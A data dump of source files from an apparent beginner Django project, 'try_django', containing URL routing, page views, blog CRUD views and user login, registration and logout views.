"alpha_fraction": 0.5658153295516968,
"alphanum_fraction": 0.5701811909675598,
"avg_line_length": 55.208587646484375,
"blob_id": "951d83d6165f401893bd005f481d88548d4623cd",
"content_id": "c86166e5e054830234a1c841559a576f1ec39a51",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9184,
"license_type": "no_license",
"max_line_length": 208,
"num_lines": 163,
"path": "/miembro/migrations/0001_initial.py",
"repo_name": "davalerova/ieee-etitc",
"src_encoding": "UTF-8",
"text": "# Generated by Django 3.0.6 on 2020-05-25 05:07\n\nfrom django.conf import settings\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Barrio',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('estado', models.BooleanField(default=True)),\n ('fc', models.DateTimeField(auto_now_add=True)),\n ('fm', models.DateTimeField(auto_now=True)),\n ('uc', models.IntegerField(blank=True, editable=False, null=True)),\n ('um', models.IntegerField(blank=True, editable=False, null=True)),\n ('descripcion', models.CharField(help_text='Descripción del barrio', max_length=45, unique=True, verbose_name='Descripción barrio')),\n ('nota', models.TextField(blank=True)),\n ],\n options={\n 'verbose_name': 'Barrio',\n 'verbose_name_plural': 'Barrios',\n },\n ),\n migrations.CreateModel(\n name='Ciudad',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('estado', models.BooleanField(default=True)),\n ('fc', models.DateTimeField(auto_now_add=True)),\n ('fm', models.DateTimeField(auto_now=True)),\n ('uc', models.IntegerField(blank=True, editable=False, null=True)),\n ('um', models.IntegerField(blank=True, editable=False, null=True)),\n ('descripcion', models.CharField(help_text='Descripción de la ciudad', max_length=45, unique=True, verbose_name='Descripción ciudad')),\n ],\n options={\n 'verbose_name': 'Ciudad',\n 'verbose_name_plural': 'Ciudades',\n },\n ),\n migrations.CreateModel(\n name='Eps',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('estado', models.BooleanField(default=True)),\n ('fc', models.DateTimeField(auto_now_add=True)),\n ('fm', models.DateTimeField(auto_now=True)),\n ('uc', models.IntegerField(blank=True, editable=False, null=True)),\n ('um', models.IntegerField(blank=True, editable=False, null=True)),\n ('descripcion', models.CharField(help_text='Descripción de la EPS', max_length=45, unique=True, verbose_name='Descripción EPS')),\n ],\n options={\n 'verbose_name': 'EPS',\n 'verbose_name_plural': \"EPS's\",\n },\n ),\n migrations.CreateModel(\n name='Genero',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('estado', models.BooleanField(default=True)),\n ('fc', models.DateTimeField(auto_now_add=True)),\n ('fm', models.DateTimeField(auto_now=True)),\n ('uc', models.IntegerField(blank=True, editable=False, null=True)),\n ('um', models.IntegerField(blank=True, editable=False, null=True)),\n ('descripcion', models.CharField(help_text='Descripción del género', max_length=45, unique=True, verbose_name='Descripción género')),\n ],\n options={\n 'verbose_name': 'Género',\n 'verbose_name_plural': 'Géneros',\n },\n ),\n migrations.CreateModel(\n name='Rol_miembro',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('estado', models.BooleanField(default=True)),\n ('fc', models.DateTimeField(auto_now_add=True)),\n ('fm', models.DateTimeField(auto_now=True)),\n ('uc', models.IntegerField(blank=True, editable=False, null=True)),\n ('um', models.IntegerField(blank=True, editable=False, null=True)),\n ('descripcion', models.CharField(help_text='Descripción de la sede dende estudia', max_length=45, unique=True, verbose_name='Descripción sede')),\n ],\n options={\n 'verbose_name': 'Rol miembro',\n 'verbose_name_plural': 'Rol miembro',\n },\n ),\n migrations.CreateModel(\n name='Sede',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('estado', models.BooleanField(default=True)),\n ('fc', models.DateTimeField(auto_now_add=True)),\n ('fm', models.DateTimeField(auto_now=True)),\n ('uc', models.IntegerField(blank=True, editable=False, null=True)),\n ('um', models.IntegerField(blank=True, editable=False, null=True)),\n ('descripcion', models.CharField(help_text='Descripción de la sede dende estudia', max_length=255, unique=True, verbose_name='Descripción sede')),\n ],\n options={\n 'verbose_name': 'Sede',\n 'verbose_name_plural': 'Sedes',\n },\n ),\n migrations.CreateModel(\n name='Tipo_sangre',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('estado', models.BooleanField(default=True)),\n ('fc', models.DateTimeField(auto_now_add=True)),\n ('fm', models.DateTimeField(auto_now=True)),\n ('uc', models.IntegerField(blank=True, editable=False, null=True)),\n ('um', models.IntegerField(blank=True, editable=False, null=True)),\n ('descripcion', models.CharField(help_text='Descripción del tipo de sangre', max_length=45, unique=True, verbose_name='Descripción tipo de sangre')),\n ],\n options={\n 'verbose_name': 'Tipo_sangre',\n 'verbose_name_plural': 'Tipo_sangre',\n },\n ),\n migrations.CreateModel(\n name='Miembro',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('estado', models.BooleanField(default=True)),\n ('fc', models.DateTimeField(auto_now_add=True)),\n ('fm', models.DateTimeField(auto_now=True)),\n ('uc', models.IntegerField(blank=True, editable=False, null=True)),\n ('um', models.IntegerField(blank=True, editable=False, null=True)),\n ('nombres', models.CharField(max_length=45, verbose_name='Nombres')),\n ('apellidos', models.CharField(max_length=45, verbose_name='Apellidos')),\n ('correo_institucional', models.EmailField(max_length=70, unique=True, verbose_name='Correo electrónico')),\n ('correo_personal', models.EmailField(max_length=70, unique=True, verbose_name='Correo electrónico')),\n ('fecha_nacimiento', models.DateField(null=True)),\n ('celular', models.CharField(max_length=15, null=True)),\n ('barrio', models.ForeignKey(help_text='Barrio donde vive el miembro', null=True, on_delete=django.db.models.deletion.PROTECT, to='miembro.Barrio', verbose_name='Barrio')),\n ('eps', models.ForeignKey(help_text='EPS del miembro', null=True, on_delete=django.db.models.deletion.PROTECT, to='miembro.Eps', verbose_name='EPS')),\n ('genero', models.ForeignKey(help_text='Gérero del miembro', null=True, on_delete=django.db.models.deletion.PROTECT, to='miembro.Genero', verbose_name='Género')),\n ('rol_miembro', models.ForeignKey(help_text='Rol del miembro dentro de la rama', null=True, on_delete=django.db.models.deletion.PROTECT, to='miembro.Rol_miembro', verbose_name='Rol miembro')),\n ('sede', models.ForeignKey(help_text='Sede donde estudia el miembro', null=True, on_delete=django.db.models.deletion.PROTECT, to='miembro.Sede', verbose_name='Sede')),\n ('tipo_sangre', models.ForeignKey(help_text='Tipo de sangre del miembro', null=True, on_delete=django.db.models.deletion.PROTECT, to='miembro.Tipo_sangre', verbose_name='RH')),\n ('usuario', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to=settings.AUTH_USER_MODEL)),\n ],\n options={\n 'verbose_name': 'Miembro',\n 'verbose_name_plural': 'Miembros',\n },\n ),\n migrations.AddField(\n model_name='barrio',\n name='ciudad',\n field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='miembro.Ciudad'),\n ),\n ]\n"
},
{
"alpha_fraction": 0.5894396305084229,
"alphanum_fraction": 0.59375,
"avg_line_length": 26.294116973876953,
"blob_id": "e7f22cd786896daa68158e3b05abac6f82e82b36",
"content_id": "610973e40c5af81d95dbe8d95ccecb1c79716888",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1860,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 68,
"path": "/actividad_interna/models.py",
"repo_name": "davalerova/ieee-etitc",
"src_encoding": "UTF-8",
"text": "from django.db import models\n\nfrom bases.models import ClaseModelo\nfrom django.contrib.auth.models import User\n# Create your models here.\n\nfrom datetime import date\n\n#################################################################################\nclass Tipo_actividad( ClaseModelo ):\n\n descripcion = models.CharField(\n max_length=45,\n help_text='Descripción del tipo de actividad',\n unique=True,\n verbose_name='Descripción tipo actividad'\n )\n\n def __str__(self):\n return '{}'.format( self.descripcion )\n\n def save(self):\n self.descripcion = self.descripcion.upper()\n super( Tipo_actividad, self ).save()\n\n class Meta:\n verbose_name = 'Tipo de actividad'\n verbose_name_plural = 'Tipos de actividades'\n\n\n#################################################################################\n\nclass Actividad_interna(ClaseModelo):\n\n tipo_actividad = models.ForeignKey(Tipo_actividad, on_delete=models.PROTECT)\n \n nombre = models.CharField(\n max_length=255,\n help_text='Nombre de la actividad',\n verbose_name='Nombre actividad'\n )\n\n descripcion = models.TextField(\n help_text='Descripción de la actividad',\n verbose_name='Descripción de la actividad'\n )\n\n fecha_actividad = models.DateTimeField(\n )\n\n lugar_actividad = models.CharField(max_length=255)\n\n solo_miembros = models.BooleanField(default=False\n )\n\n\n def save(self):\n self.nombre = self.nombre.upper()\n self.descripcion = self.descripcion.capitalize()\n self.lugar_actividad = self.lugar_actividad.upper()\n super( Actividad_interna, self ).save()\n \n def __str__(self):\n return '{}'.format( self.nombre)\n\n class Meta:\n verbose_name = 'Actividad interna'\n verbose_name_plural = 'Actividades internas'\n"
},
{
"alpha_fraction": 0.6289905309677124,
"alphanum_fraction": 0.6289905309677124,
"avg_line_length": 25.976743698120117,
"blob_id": "b6cca5b7be83ca0e5f79d82dc20c29a697c10252",
"content_id": "2a52ee076e5ead597e806789ed64a41db5ffa773",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1159,
"license_type": "no_license",
"max_line_length": 120,
"num_lines": 43,
"path": "/miembro/views.py",
"repo_name": "davalerova/ieee-etitc",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render, redirect\nfrom django.views import generic\nfrom django.http import HttpResponse\nfrom django.urls import reverse_lazy\nfrom django.shortcuts import render, redirect\n\n\nfrom .models import Miembro\nfrom django.contrib.auth.models import User\n#from .forms import *\n\n\n########################################################################################################################\n\nclass MiembroView(generic.ListView):\n model = Miembro\n template_name = 'miembro/miembro_listar.html'\n context_object_name = 'obj'\n\n\n\n\ndef miembro_inactivar(request, id):\n miembro = Miembro.objects.filter(pk=id).first()\n usuario = User.objects.filter(pk=miembro.usuario.id).first()\n contexto={}\n template_name=\"miembro/miembro_del.html\"\n\n\n if not miembro:\n return redirect(\"miembro:miembro_listar\")\n \n if request.method=='GET':\n contexto={'obj':miembro}\n \n if request.method=='POST':\n miembro.activo=False\n miembro.save()\n usuario.is_active=False\n usuario.save()\n return redirect(\"miembro:miembro_listar\")\n\n return render(request,template_name,contexto)"
},
{
"alpha_fraction": 0.45917603373527527,
"alphanum_fraction": 0.4823969900608063,
"avg_line_length": 24.188678741455078,
"blob_id": "2bd0e513ee4185077e7331df6ead36b40934bbc8",
"content_id": "cc30c91c96917dd5968e86da0b7984ca44c7e9c0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1335,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 53,
"path": "/miembro/migrations/0003_auto_20200525_1753.py",
"repo_name": "davalerova/ieee-etitc",
"src_encoding": "UTF-8",
"text": "# Generated by Django 3.0.6 on 2020-05-25 22:53\n\nfrom django.db import migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('miembro', '0002_auto_20200525_1611'),\n ]\n\n operations = [\n migrations.RenameField(\n model_name='barrio',\n old_name='estado',\n new_name='activo',\n ),\n migrations.RenameField(\n model_name='ciudad',\n old_name='estado',\n new_name='activo',\n ),\n migrations.RenameField(\n model_name='eps',\n old_name='estado',\n new_name='activo',\n ),\n migrations.RenameField(\n model_name='genero',\n old_name='estado',\n new_name='activo',\n ),\n migrations.RenameField(\n model_name='miembro',\n old_name='estado',\n new_name='activo',\n ),\n migrations.RenameField(\n model_name='rol_miembro',\n old_name='estado',\n new_name='activo',\n ),\n migrations.RenameField(\n model_name='sede',\n old_name='estado',\n new_name='activo',\n ),\n migrations.RenameField(\n model_name='tipo_sangre',\n old_name='estado',\n new_name='activo',\n ),\n ]\n"
},
{
"alpha_fraction": 0.7942386865615845,
"alphanum_fraction": 0.7942386865615845,
"avg_line_length": 39.5,
"blob_id": "6ba2fa4be97b743cc5ab0d803a1b77d6f870c798",
"content_id": "75d7829c3c27d828fad8ece564d780c0cdc2a6bd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 246,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 6,
"path": "/bases/admin.py",
"repo_name": "davalerova/ieee-etitc",
"src_encoding": "UTF-8",
"text": "from django.contrib import admin\n\n# Register your models here.\nadmin.site.site_header = \"Panel de administración IEEE-ETITC\"\nadmin.site.site_title = \"Portal de administración\"\nadmin.site.index_title = \"Bienvenidos al portal de administración\"\n"
},
{
"alpha_fraction": 0.5419847369194031,
"alphanum_fraction": 0.5601878762245178,
"avg_line_length": 31.132076263427734,
"blob_id": "9f75c4d8b6488c06300a52d11ff3246c6974dc8e",
"content_id": "1e27dc397a4715688103e55adb2edad1af8cb714",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1711,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 53,
"path": "/miembro/migrations/0004_auto_20200526_0132.py",
"repo_name": "davalerova/ieee-etitc",
"src_encoding": "UTF-8",
"text": "# Generated by Django 3.0.6 on 2020-05-26 06:32\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('miembro', '0003_auto_20200525_1753'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='barrio',\n name='activo',\n field=models.BooleanField(default=True, verbose_name='Está activo'),\n ),\n migrations.AlterField(\n model_name='ciudad',\n name='activo',\n field=models.BooleanField(default=True, verbose_name='Está activo'),\n ),\n migrations.AlterField(\n model_name='eps',\n name='activo',\n field=models.BooleanField(default=True, verbose_name='Está activo'),\n ),\n migrations.AlterField(\n model_name='genero',\n name='activo',\n field=models.BooleanField(default=True, verbose_name='Está activo'),\n ),\n migrations.AlterField(\n model_name='miembro',\n name='activo',\n field=models.BooleanField(default=True, verbose_name='Está activo'),\n ),\n migrations.AlterField(\n model_name='rol_miembro',\n name='activo',\n field=models.BooleanField(default=True, verbose_name='Está activo'),\n ),\n migrations.AlterField(\n model_name='sede',\n name='activo',\n field=models.BooleanField(default=True, verbose_name='Está activo'),\n ),\n migrations.AlterField(\n model_name='tipo_sangre',\n name='activo',\n field=models.BooleanField(default=True, verbose_name='Está activo'),\n ),\n ]\n"
},
{
"alpha_fraction": 0.576184868812561,
"alphanum_fraction": 0.5851938724517822,
"avg_line_length": 48.096153259277344,
"blob_id": "7a781ef8dae2b401f93bbb384fb3ac2a6551973b",
"content_id": "4c0fe118a2682f46f0afee31f863508f51f08e70",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2559,
"license_type": "no_license",
"max_line_length": 168,
"num_lines": 52,
"path": "/actividad_interna/migrations/0001_initial.py",
"repo_name": "davalerova/ieee-etitc",
"src_encoding": "UTF-8",
"text": "# Generated by Django 3.0.6 on 2020-05-26 06:24\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Tipo_actividad',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('activo', models.BooleanField(default=True, verbose_name='Está activo')),\n ('fc', models.DateTimeField(auto_now_add=True)),\n ('fm', models.DateTimeField(auto_now=True)),\n ('uc', models.IntegerField(blank=True, editable=False, null=True)),\n ('um', models.IntegerField(blank=True, editable=False, null=True)),\n ('descripcion', models.CharField(help_text='Descripción del tipo de actividad', max_length=45, unique=True, verbose_name='Descripción tipo actividad')),\n ],\n options={\n 'verbose_name': 'Tipo de actividad',\n 'verbose_name_plural': 'Tipos de actividades',\n },\n ),\n migrations.CreateModel(\n name='Actividad_interna',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('activo', models.BooleanField(default=True, verbose_name='Está activo')),\n ('fc', models.DateTimeField(auto_now_add=True)),\n ('fm', models.DateTimeField(auto_now=True)),\n ('uc', models.IntegerField(blank=True, editable=False, null=True)),\n ('um', models.IntegerField(blank=True, editable=False, null=True)),\n ('nombre', models.CharField(help_text='Nombre de la actividad', max_length=255, verbose_name='Nombre actividad')),\n ('descripcion', models.TextField(help_text='Descripción de la actividad', verbose_name='Descripción de la actividad')),\n ('fecha_actividad', models.DateTimeField()),\n ('lugar_actividad', models.TextField(max_length=255)),\n ('solo_miembros', models.BooleanField(default=False)),\n ('tipo_actividad', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='actividad_interna.Tipo_actividad')),\n ],\n options={\n 'verbose_name': 'Actividad interna',\n 'verbose_name_plural': 'Actividades internas',\n },\n ),\n ]\n"
}
] | 17 |
ak-S24/stone-paper-scissors-
|
https://github.com/ak-S24/stone-paper-scissors-
|
265cf73de0e5dd1a9b577d6cb40883d23b49496a
|
16660b70009e94be1febeb1f3c7795adcf219d59
|
e0a02143dd7eba04922c8b113283fb465bf2080a
|
refs/heads/master
| 2022-10-21T20:39:25.409087 | 2020-06-15T11:13:23 | 2020-06-15T11:13:23 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6593712568283081,
"alphanum_fraction": 0.6995622515678406,
"avg_line_length": 24.793813705444336,
"blob_id": "83a3e1d1cf17d3618d4e595d4941c9ca97e45654",
"content_id": "62ea8e545dda698ae2fcc74526f1921ae48b4498",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2513,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 97,
"path": "/st_pa_sc.py",
"repo_name": "ak-S24/stone-paper-scissors-",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jun 9 11:07:58 2020\n\n@author: akku\n\"\"\"\nfrom keras.models import Sequential\nfrom keras.layers import Conv2D\nfrom keras.layers import MaxPooling2D\nfrom keras.layers import Flatten\nfrom keras.layers import Dense\nfrom keras.layers import Dropout\n\n#initializing the classifier object\nclassifier= Sequential()\n\n#creating convolutional layer\nclassifier.add(Conv2D(32, kernel_size=(3, 3), input_shape=(64, 64, 3), activation='relu'))\n\n#pooling the convolved layer\nclassifier.add(MaxPooling2D(pool_size=(2,2)))\n\n#adding second convolution layer\nclassifier.add(Conv2D(32, kernel_size=(3, 3), activation='relu'))\n\n#pooling\nclassifier.add(MaxPooling2D(pool_size=(2,2)))\n\n#flattening the layers\nclassifier.add(Flatten())\n\n#making a full connection\nclassifier.add(Dense(units=128, activation='relu'))\nclassifier.add(Dropout(0.2))\nclassifier.add(Dense(units=128, activation ='relu'))\nclassifier.add(Dropout(0.2))\nclassifier.add(Dense(units=3, activation='softmax'))\n\n#compiling \nclassifier.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])\n\nfrom keras.preprocessing.image import ImageDataGenerator\n\n#fitting the cnn to the images\ntrain_data= ImageDataGenerator(\n rescale=1./255,\n shear_range=0.2,\n zoom_range=0.2,\n horizontal_flip=True)\ntest_data = ImageDataGenerator(rescale=1./255)\ntrain_generator = train_data.flow_from_directory(\n 'train_set',\n target_size=(64, 64),\n batch_size=32,\n class_mode='categorical')\ntest_generator = test_data.flow_from_directory(\n 'test_set',\n target_size=(64, 64),\n batch_size=32,\n class_mode='categorical')\n\ntrain_generator.class_indices\n\n\n#train the model\nclassifier.fit(\n train_generator,\n steps_per_epoch=2520,\n epochs=5,\n validation_data=test_generator,\n validation_steps=372)\n\n\n\n#loading the saved model\nfrom keras.models import load_model\nmodel=load_model('model2.h5')\nmodel.summary()\n\n\n\n#making a single prediction\nimport numpy as np\nfrom keras.preprocessing import image\n\nsingle_image=image.load_img('single_pred/test2.jpg', target_size=(64, 64))\nsingle_image=image.img_to_array(single_image)\nsingle_image=np.expand_dims(single_image, axis=0)\npred=model.predict(single_image)\n\nx, y,z=round(pred[0][0]),round( pred[0][1]),round(pred[0][2])\nif((x, y, z)==(1, 0, 0)):\n print('paper')\nelif((x, y, z)==(0, 1, 0)):\n print('rock')\nelif((x, y, z)==(0, 0, 1)):\n print('scissors')\n \n\n \n"
}
] | 1 |
akshaymishra5395/try_django
|
https://github.com/akshaymishra5395/try_django
|
bfe10de176a9f91f3974da25109f6dd88c8eed5a
|
8902ae961cd04ef699a4767e7df77db8189b43f3
|
bd1f96c707b8a2cf4c4dae75d685d23849ec057f
|
refs/heads/master
| 2020-05-17T14:28:54.773383 | 2019-04-30T19:01:30 | 2019-04-30T19:01:30 | 183,765,462 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7333939671516418,
"alphanum_fraction": 0.7379435896873474,
"avg_line_length": 22.869565963745117,
"blob_id": "508368c3c0105133fc16f67546b1d615335e2712",
"content_id": "cee54d65cea388d966d22d61f68bacdb91eea5d0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1099,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 46,
"path": "/try_django/views.py",
"repo_name": "akshaymishra5395/try_django",
"src_encoding": "UTF-8",
"text": "from django.http import HttpResponse\nfrom django.shortcuts import render\nfrom django.template.loader import get_template\nfrom django.contrib.auth.decorators import login_required\n\nfrom .forms import ContactForm\n\n@login_required\ndef home_page(request):\n\tcontext={\"title\":'home'}\n\tif request.user.is_authenticated:\n\t\tcontext={\"title\":'home',\"list\":[1,2,3,4,5]}\n\treturn render(request,\"home.html\",context);\n\ndef about_page(request):\n\tcontext={\"title\":'about'}\n\treturn render(request,\"about.html\",context);\n\n\ndef contact_page(request):\n\tform=ContactForm(request.POST or None)\n\tif form.is_valid():\n\t\tprint(form.cleaned_data)\n\t\tform=ContactForm()\n\telse:\n\t\tprint('hii')\n\n\ttemplate_name='contact.html'\n\tcontext={\n\t\t\t\"title\":'contact',\n\t\t\t\"form\" : form\n\t\t\t}\n\treturn render(request,template_name,context);\n\n\n\ndef courses_page(request):\n\tcontext={\"title\":'home'}\n\treturn render(request,\"home.html\",context);\n\ndef example_page(request):\n\tcontext={\"title\":'Example'}\n\ttemplate_name='home.html'\n\ttemplate_obj=get_template(template_name)\n\trender_obj=template_obj.render(context)\n\treturn HttpResponse(render_obj);\n\n"
},
{
"alpha_fraction": 0.6818820238113403,
"alphanum_fraction": 0.6875,
"avg_line_length": 33.73170852661133,
"blob_id": "b592ac49f112d01334890f4cb4bc178b4c1fb166",
"content_id": "761b85db5a6e55b71234f0595b5bc446e1157918",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1424,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 41,
"path": "/try_django/urls.py",
"repo_name": "akshaymishra5395/try_django",
"src_encoding": "UTF-8",
"text": "\"\"\"try_django URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.0/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path,re_path,include #url\n\nfrom .views import home_page,about_page,contact_page,courses_page,example_page\nfrom blog.views import blog_post_create_view\nfrom accounts.views import login_view,register_view,logout_view\n\nurlpatterns = [\n path('accounts/register/',register_view),\n path('accounts/login/',login_view),\n path('accounts/logout/',logout_view),\n\t\n path('', home_page),\n\tpath('home/', home_page),\n \n \n \n path('blog/', include('blog.urls')),\n path('blog-new/', blog_post_create_view),\n #re_path(r'^about/$', about_page),\n\tre_path(r'^about/$', about_page),\n\tpath('contact/', contact_page),\n\tpath('courses/', courses_page),\n path('example/', example_page),\n path('cfe-admin/', admin.site.urls)\n]\n"
},
{
"alpha_fraction": 0.517241358757019,
"alphanum_fraction": 0.517241358757019,
"avg_line_length": 15,
"blob_id": "96e31063e9ebf260d94b2db604077b8742caf777",
"content_id": "b0eb1ba972d220c9a0d68589a32cda392df3aa6b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 145,
"license_type": "no_license",
"max_line_length": 35,
"num_lines": 9,
"path": "/blog/templates/blog/list.html",
"repo_name": "akshaymishra5395/try_django",
"src_encoding": "UTF-8",
"text": "{% extends 'base.html'%}\n\n{%block content%}\n\t<table>\n\t\t{%for a in obj%}\n\t\t<tr><td>{{a.title}}</td></tr></p>\n\t\t{%endfor%}\n\t</table>\n{%endblock%}\n "
},
{
"alpha_fraction": 0.6388676166534424,
"alphanum_fraction": 0.6388676166534424,
"avg_line_length": 30.14285659790039,
"blob_id": "447ec4d5cda79a97b7a69fd52e7e16d3f494b8fe",
"content_id": "358f3762a36ad525e009bd72707db588cdd75384",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1307,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 42,
"path": "/accounts/views.py",
"repo_name": "akshaymishra5395/try_django",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render,redirect\nfrom django.contrib.auth import authenticate,get_user_model,login,logout\n\nfrom .forms import UserLoginForm ,RegisterForm\n\ndef login_view(request):\n next=request.GET.get('next')\n form = UserLoginForm(request.POST or None)\n if form.is_valid():\n username=form.cleaned_data.get('username')\n password=form.cleaned_data.get('password')\n user=authenticate(username=username ,password=password)\n login(request , user)\n if next:\n return redirect(next)\n return redirect('/')\n context={\n 'form':form\n }\n return render(request,'login.html',context)\n\ndef register_view(request):\n next=request.GET.get('next')\n form = RegisterForm(request.POST or None)\n if form.is_valid():\n user=form.save(commit=False)\n password=form.cleaned_data.get('password')\n user.set_password(password)\n user.save()\n new_user=authenticate(username=user.username ,password=password)\n login(request , new_user)\n if next:\n return redirect(next)\n return redirect('/')\n context={\n 'form':form\n }\n return render(request,'signup.html',context)\n\ndef logout_view(request):\n logout(request)\n return redirect('/')"
},
{
"alpha_fraction": 0.7474257946014404,
"alphanum_fraction": 0.7577226161956787,
"avg_line_length": 26.53333282470703,
"blob_id": "a860e6ef2adf767f1cd1466c714c42dcda9244cb",
"content_id": "335b888973d641d6344b754564c60c0a471b5dde",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1651,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 60,
"path": "/blog/views.py",
"repo_name": "akshaymishra5395/try_django",
"src_encoding": "UTF-8",
"text": "from django.http import Http404\nfrom django.shortcuts import render,get_object_or_404\n\n# Create your views here.\nfrom .models import BlogPost\nfrom .forms import BlogPostModelForm\n\ndef blog_post_detail_page(request,slug):\n\tobj=get_object_or_404(BlogPost,slug=slug)\n\t#qs=BlogPost.objects.filter(slug=slug)\n\t#if qs.count()==0:\n\t#\traise Http404\n\t#obj=qs.first()\n\ttemplate_name=\"blog/detail.html\"\n\tcontext={'obj':obj}\n\treturn render(request,template_name,context)\n\n\n\n\ndef blog_post_list_view(request):\n\tobj=BlogPost.objects.all()\n\ttemplate_name=\"blog/list.html\"\n\tcontext={'obj':obj}\n\treturn render(request,template_name,context)\n\n\ndef blog_post_create_view(request):\n\tform=BlogPostModelForm(request.POST or None)\n\tif form.is_valid():\n\t\t#obj=BlogPost.objects.create(**form.cleaned_data)\n\t\tobj=form.save(commit=False)\n\t\t#obj.title=form.cleaned_data['title']+'0'\n\t\tobj.save()\n\t\tform=BlogPostModelForm()\n\ttemplate_name=\"blog/create.html\"\n\tcontext={'form':form}\n\treturn render(request,template_name,context)\n\ndef blog_post_detail_view(request,slug):\n\tobj=BlogPost.objects.filter(slug=slug)\n\ttemplate_name=\"blog/detail.html\"\n\tcontext={'obj':obj.first()}\n\treturn render(request,template_name,context)\n\ndef blog_post_retreive_view(request):\n\ttemplate_name=\"blog/retrieve.html\"\n\tcontext={}\n\treturn render(request,template_name,context)\n\ndef blog_post_update_view(request,slug):\n\tobj=get_object_or_404(BlogPost,slug=slug)\n\ttemplate_name=\"blog/update.html\"\n\tcontext={'object':obj,'form':None}\n\treturn render(request,template_name,context)\n\ndef blog_post_delete_view(request):\n\ttemplate_name=\"blog/delete.html\"\n\tcontext={}\n\treturn render(request,template_name,context)"
},
{
"alpha_fraction": 0.7581573724746704,
"alphanum_fraction": 0.7581573724746704,
"avg_line_length": 27.94444465637207,
"blob_id": "109ebebf4740504dc54133468bfe68445824d17f",
"content_id": "111f23f79e709bdc4f31fcf35818049544a50769",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 521,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 18,
"path": "/blog/forms.py",
"repo_name": "akshaymishra5395/try_django",
"src_encoding": "UTF-8",
